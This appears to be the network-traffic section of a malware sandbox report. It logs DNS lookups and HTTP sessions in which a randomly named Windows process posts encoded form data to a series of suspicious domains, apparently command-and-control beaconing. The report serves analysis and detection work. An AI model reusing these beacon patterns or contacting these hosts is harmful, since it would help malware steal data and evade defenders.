                                                            Dec 5, 2024 19:39:49.249794960 CET | 1.1.1.1 | 192.168.2.7 | 0x71c2 | No error (0) | ssl.goentri.com | - | 13.248.221.243 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:39:49.249794960 CET | 1.1.1.1 | 192.168.2.7 | 0x71c2 | No error (0) | ssl.goentri.com | - | 76.223.74.74 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:40:05.192723036 CET | 1.1.1.1 | 192.168.2.7 | 0x3507 | No error (0) | www.sankan-fukushi.info | - | 163.44.185.183 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:40:05.192742109 CET | 1.1.1.1 | 192.168.2.7 | 0x3507 | No error (0) | www.sankan-fukushi.info | - | 163.44.185.183 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:40:20.294769049 CET | 1.1.1.1 | 192.168.2.7 | 0xd617 | No error (0) | www.conansog.shop | - | 104.21.41.74 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:40:20.294769049 CET | 1.1.1.1 | 192.168.2.7 | 0xd617 | No error (0) | www.conansog.shop | - | 172.67.162.12 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:14.456975937 CET | 1.1.1.1 | 192.168.2.7 | 0xf1dd | No error (0) | www.beythome.online | redirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:14.456975937 CET | 1.1.1.1 | 192.168.2.7 | 0xf1dd | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:14.456975937 CET | 1.1.1.1 | 192.168.2.7 | 0xf1dd | No error (0) | natroredirect.natrocdn.com | - | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:14.512089014 CET | 1.1.1.1 | 192.168.2.7 | 0xf1dd | No error (0) | www.beythome.online | redirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:14.512089014 CET | 1.1.1.1 | 192.168.2.7 | 0xf1dd | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:14.512089014 CET | 1.1.1.1 | 192.168.2.7 | 0xf1dd | No error (0) | natroredirect.natrocdn.com | - | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:29.735240936 CET | 1.1.1.1 | 192.168.2.7 | 0x62af | No error (0) | www.tempatmudisini06.click | tempatmudisini06.click | - | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:29.735240936 CET | 1.1.1.1 | 192.168.2.7 | 0x62af | No error (0) | tempatmudisini06.click | - | 103.21.221.4 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:44.776254892 CET | 1.1.1.1 | 192.168.2.7 | 0xdf88 | No error (0) | www.questmatch.pro | - | 104.21.62.184 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:44.776254892 CET | 1.1.1.1 | 192.168.2.7 | 0xdf88 | No error (0) | www.questmatch.pro | - | 172.67.138.37 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:59.787003040 CET | 1.1.1.1 | 192.168.2.7 | 0xfed7 | No error (0) | www.callyur.shop | callyur.shop | - | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:59.787003040 CET | 1.1.1.1 | 192.168.2.7 | 0xfed7 | No error (0) | callyur.shop | - | 66.29.137.10 | A (IP address) | IN (0x0001) | false
                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.7 | 49753 | 104.21.77.71 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:39:32.291562080 CET | 555 | OUT | GET /wbcb/?wVb0=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.aziziyeescortg.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:39:33.609416008 CET | 1121 | IN | HTTP/1.1 404 Not Found
                                                            Date: Thu, 05 Dec 2024 18:39:33 GMT
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36ws1lCkjiKO0ZV4eViArTQK3vRWHTs2nG1AnsOiSIeRVTq556BXw%2BWBStqVgc5GM9HnEvtCInPQCU4Kny%2Fd44GCNTrvHSeTJIMUBuF5btHW1WzOMKOuCqNEEJ8fLVrQ5d%2BJFFamZNe8"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ed628d889210f93-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=555&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.7 | 49790 | 13.248.221.243 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:39:49.388859987 CET | 832 | OUT | POST /5rfk/ HTTP/1.1
                                                            Host: www.grandesofertas.fun
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.grandesofertas.fun
                                                            Referer: http://www.grandesofertas.fun/5rfk/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0=hBRTXVZZoqfFQ4dlBafnbCC8FYV9NOX8zOBSyWnTDUCTknaMHmN2Z8uirvWLS2LqB8lV1Q6PLRChm0oVFPkytlla1GqcuWqS4xgKjWu6Mf9XlBI0RKQgpXKWkJ1LvW/M57fMEzp3linFZYqef09I8BaAD+kq9AARKHQOFUe1uLIKV0GCnPnbLXhwji11r8C4RI8xL4rk+xGaBWugSQ==
                                                            Dec 5, 2024 19:39:50.538296938 CET | 456 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Thu, 05 Dec 2024 18:39:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.grandesofertas.fun/5rfk/
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.7 | 49800 | 13.248.221.243 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:39:52.059921980 CET | 852 | OUT | POST /5rfk/ HTTP/1.1
                                                            Host: www.grandesofertas.fun
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.grandesofertas.fun
                                                            Referer: http://www.grandesofertas.fun/5rfk/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0=hBRTXVZZoqfFRYtlH9DnKSC7J4V9DuX4zONSyVr5CguTkFCMdiZ2e8ui4vWOcWL1B8hd1RGPLVqhm0YVG+kxs1lY5mqSqWqS4xgKjW7fMf1Xkx40Rv8/3HKVz51LrW/I57fyE3JRlnjFZYaeemFLyBbJcOlt4h0UFksiAT6vnsJpQCHg9tr3VGZLngRD8afNTJ4pGafFhGjwMEPkEm8ihiFPEtEUghMK7EG6u2o=
                                                            Dec 5, 2024 19:39:53.202189922 CET | 456 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Thu, 05 Dec 2024 18:39:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.grandesofertas.fun/5rfk/
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.7 | 49806 | 13.248.221.243 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:39:54.716480017 CET | 1865 | OUT | POST /5rfk/ HTTP/1.1
                                                            Host: www.grandesofertas.fun
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.grandesofertas.fun
                                                            Referer: http://www.grandesofertas.fun/5rfk/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 68 42 52 54 58 56 5a 5a 6f 71 66 46 52 59 74 6c 48 39 44 6e 4b 53 43 37 4a 34 56 39 44 75 58 34 7a 4f 4e 53 79 56 72 35 43 68 36 54 6c 77 65 4d 48 46 31 32 66 38 75 69 6a 50 57 50 63 57 4c 34 42 34 4e 5a 31 52 4b 31 4c 54 75 68 67 6e 67 56 44 4d 63 78 6d 31 6c 59 78 47 71 54 75 57 71 48 34 78 77 47 6a 57 72 66 4d 66 31 58 6b 33 55 30 59 61 51 2f 31 48 4b 57 6b 4a 30 45 76 57 2f 67 35 2f 4c 39 45 33 4d 71 6c 55 62 46 5a 38 2b 65 64 56 39 4c 74 78 62 48 66 4f 6c 50 34 68 70 45 46 6b 41 75 41 57 75 4a 6e 72 39 70 52 56 69 6e 35 50 62 4f 4d 57 56 4e 67 51 34 67 33 38 50 50 53 49 56 55 4a 4b 2f 71 39 6c 58 55 50 7a 54 71 4e 43 38 76 68 68 78 65 4a 39 67 57 6a 55 59 47 6d 48 61 59 33 43 63 77 2f 30 73 58 77 79 53 30 62 7a 67 66 30 76 70 54 6c 43 32 57 2b 65 68 6f 6c 58 55 49 77 68 2b 37 34 69 42 75 35 36 51 59 4b 69 58 76 74 77 72 55 6c 4a 62 7a 6e 72 6e 6f 34 58 7a 38 73 37 36 32 67 79 53 32 37 4a 45 48 4c 5a 58 66 43 5a 57 77 4b 47 73 6f 33 5a 4e 66 68 69 73 65 7a 32 65 4b 31 51 30 56 71 [TRUNCATED]
                                                            Data Ascii: wVb0= [TRUNCATED]
                                                            Dec 5, 2024 19:39:55.860114098 CET | 456 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Thu, 05 Dec 2024 18:39:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.grandesofertas.fun/5rfk/
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.7 | 49814 | 13.248.221.243 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:39:57.366792917 CET | 555 | OUT | GET /5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwkB1wGODpj+x1UAb80+hCsFXkgAnUr413w2hk7wj/03GtdXjGHp26G6Z&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.grandesofertas.fun
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:39:58.566637039 CET | 614 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Thu, 05 Dec 2024 18:39:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwkB1wGODpj+x1UAb80+hCsFXkgAnUr413w2hk7wj/03GtdXjGHp26G6Z&0r=XzjtrBPP
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.7 | 49834 | 163.44.185.183 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:40:05.331855059 CET | 835 | OUT | POST /21k5/ HTTP/1.1
                                                            Host: www.sankan-fukushi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sankan-fukushi.info
                                                            Referer: http://www.sankan-fukushi.info/21k5/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 77 50 67 70 42 65 7a 5a 47 62 68 43 77 59 4d 64 68 2b 58 77 4a 6b 4d 5a 67 39 6e 34 49 66 79 6f 35 39 37 43 4b 36 45 64 38 67 4e 6f 52 41 37 70 68 35 36 4f 4c 78 46 48 43 37 74 63 46 36 66 47 41 79 73 37 67 53 73 77 57 4f 76 41 49 41 34 37 6b 78 75 46 70 52 74 64 6a 75 65 30 57 74 61 52 53 6a 73 6f 36 55 65 53 57 4b 46 73 66 48 6a 59 59 6c 32 59 65 6f 6a 78 77 4e 49 54 56 30 37 50 4e 4f 72 63 39 4f 73 5a 79 59 6a 6d 45 4e 4c 72 77 79 63 33 30 38 74 52 4d 4b 62 78 6f 48 37 46 36 5a 46 52 42 64 44 30 48 6b 45 46 52 49 51 4b 48 52 66 51 6b 6b 42 74 70 4a 6f 54 55 51 4f 62 31 4b 56 6f 2f 51 3d 3d
                                                            Data Ascii: wVb0=SUzGnuvHqjrdwPgpBezZGbhCwYMdh+XwJkMZg9n4Ifyo597CK6Ed8gNoRA7ph56OLxFHC7tcF6fGAys7gSswWOvAIA47kxuFpRtdjue0WtaRSjso6UeSWKFsfHjYYl2YeojxwNITV07PNOrc9OsZyYjmENLrwyc308tRMKbxoH7F6ZFRBdD0HkEFRIQKHRfQkkBtpJoTUQOb1KVo/Q==
                                                            Dec 5, 2024 19:40:06.745906115 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Thu, 05 Dec 2024 18:40:06 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 19268
                                                            Connection: close
                                                            Server: Apache
                                                            Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                            Dec 5, 2024 19:40:06.745925903 CET | 1236 | IN | Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                            Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
                                                            Dec 5, 2024 19:40:06.745938063 CET | 448 | IN | Data Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61
                                                            Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
                                                            Dec 5, 2024 19:40:06.745982885 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 38 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 63 61 6c 63 28 35 30 25 20 20 2d 20 31 30 70 78 29 3b 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: z-index: 1; bottom: -8px; left: calc(50% - 10px); display: block; width: 0; content: ''; border-width: 10px 8px 0; border-style: solid; border-color: #fc3 transparent;
                                                            Dec 5, 2024 19:40:06.745995998 CET | 1236 | IN | Data Raw: 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e
                                                            Data Ascii: } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal { display: inline; float: left; } } .lol-error-page__ad-banner-holizontal-right { margin-left: 0;
                                                            Dec 5, 2024 19:40:06.746009111 CET | 1236 | IN | Data Raw: 2e 31 20 30 2d 32 34 2e 33 31 37 20 33 2e 39 38 38 2d 33 30 2e 31 35 33 20 31 31 2e 38 36 2d 39 2e 34 20 31 32 2e 35 30 37 2d 34 2e 34 38 39 20 33 30 2e 30 31 31 2d 34 2e 33 20 33 30 2e 37 34 38 2e 30 35 32 2e 31 36 36 2e 31 32 37 2e 33 32 33 2e
                                                            Data Ascii: .1 0-24.317 3.988-30.153 11.86-9.4 12.507-4.489 30.011-4.3 30.748.052.166.127.323.224.467-.326 3.036-.826 6.051-1.5 9.03-1.691 7.962-3.442 16.209 1.5 22.44 4.942 6.231 15.69 9.155 33.7 9.226h.718c17.583 0 28.1-2.845 33.056-8.94 4.956-6.095 3.3
                                                            Dec 5, 2024 19:40:06.746022940 CET | 1236 | IN | Data Raw: 32 34 32 2d 2e 35 6c 2d 31 31 2e 30 34 34 2d 31 30 2e 35 32 37 63 2d 2e 34 30 31 2d 2e 33 39 2d 2e 36 2d 2e 39 34 34 2d 2e 35 33 39 2d 31 2e 35 6c 32 2e 39 39 33 2d 32 33 2e 38 38 35 63 2e 31 31 31 2d 2e 39 2e 38 37 34 2d 31 2e 35 37 37 20 31 2e
                                                            Data Ascii: 242-.5l-11.044-10.527c-.401-.39-.6-.944-.539-1.5l2.993-23.885c.111-.9.874-1.577 1.781-1.58h16.521c.887-.001 1.643.644 1.781 1.52l2.992 23.972c.054.561-.156 1.116-.569 1.5l-11.417 10.538c-.343.311-.794.476-1.257.462z"/><path fill="#fff" d="M42.
                                                            Dec 5, 2024 19:40:06.746318102 CET | 1236 | IN | Data Raw: 2e 39 2d 38 2e 32 39 33 2d 32 32 2e 34 34 37 2d 31 39 2e 35 36 36 2e 31 36 38 2d 31 2e 36 30 35 2e 31 31 37 2d 33 2e 32 32 35 2d 2e 31 35 2d 34 2e 38 31 36 2d 2e 31 2d 2e 39 31 38 2d 2e 32 32 34 2d 31 2e 39 31 31 2d 2e 32 38 34 2d 33 2e 30 31 2d
                                                            Data Ascii: .9-8.293-22.447-19.566.168-1.605.117-3.225-.15-4.816-.1-.918-.224-1.911-.284-3.01-.06-1.099 0-2.017 0-3.01.156-1.888-.073-3.787-.673-5.584 1.197-7.123 5.212-13.464 11.139-17.593 7.482 7.736 22.117 10.821 34.418 10.535.947 2.363 1.615 4.828 1.9
                                                            Dec 5, 2024 19:40:06.746332884 CET | 1236 | IN | Data Raw: 2d 2e 30 32 33 2d 31 2e 33 32 36 2d 2e 34 35 2d 31 2e 36 30 32 2d 31 2e 30 39 35 73 2d 2e 31 35 34 2d 31 2e 33 39 32 2e 33 31 34 2d 31 2e 39 31 35 63 32 2e 31 32 36 2d 31 2e 39 34 36 20 35 2e 31 39 38 2d 32 2e 34 35 39 20 37 2e 38 34 31 2d 31 2e
                                                            Data Ascii: -.023-1.326-.45-1.602-1.095s-.154-1.392.314-1.915c2.126-1.946 5.198-2.459 7.841-1.309.897.402 1.307 1.448.924 2.353-.383.905-1.42 1.337-2.333.972-1.287-.538-2.765-.337-3.861.527-.35.32-.813.488-1.287.467h.004zm32.054.137c-.487-.003-.952-.204-1
                                                            Dec 5, 2024 19:40:06.746455908 CET | 1236 | IN | Data Raw: 2e 32 38 34 2d 2e 36 34 37 63 2d 2e 39 39 37 2d 2e 30 33 38 2d 31 2e 37 37 36 2d 2e 38 37 37 2d 31 2e 37 33 38 2d 31 2e 38 37 34 2e 30 33 38 2d 2e 39 39 37 2e 38 37 37 2d 31 2e 37 37 36 20 31 2e 38 37 34 2d 31 2e 37 33 38 6c 31 35 2e 38 39 32 2e
                                                            Data Ascii: .284-.647c-.997-.038-1.776-.877-1.738-1.874.038-.997.877-1.776 1.874-1.738l15.892.587 2.439-8.338c.145-.658.646-1.18 1.297-1.352.651-.172 1.345.034 1.796.534.452.5.586 1.211.348 1.841l-2.825 9.693c-.232.793-.974 1.327-1.8 1.294z"/><path fill="
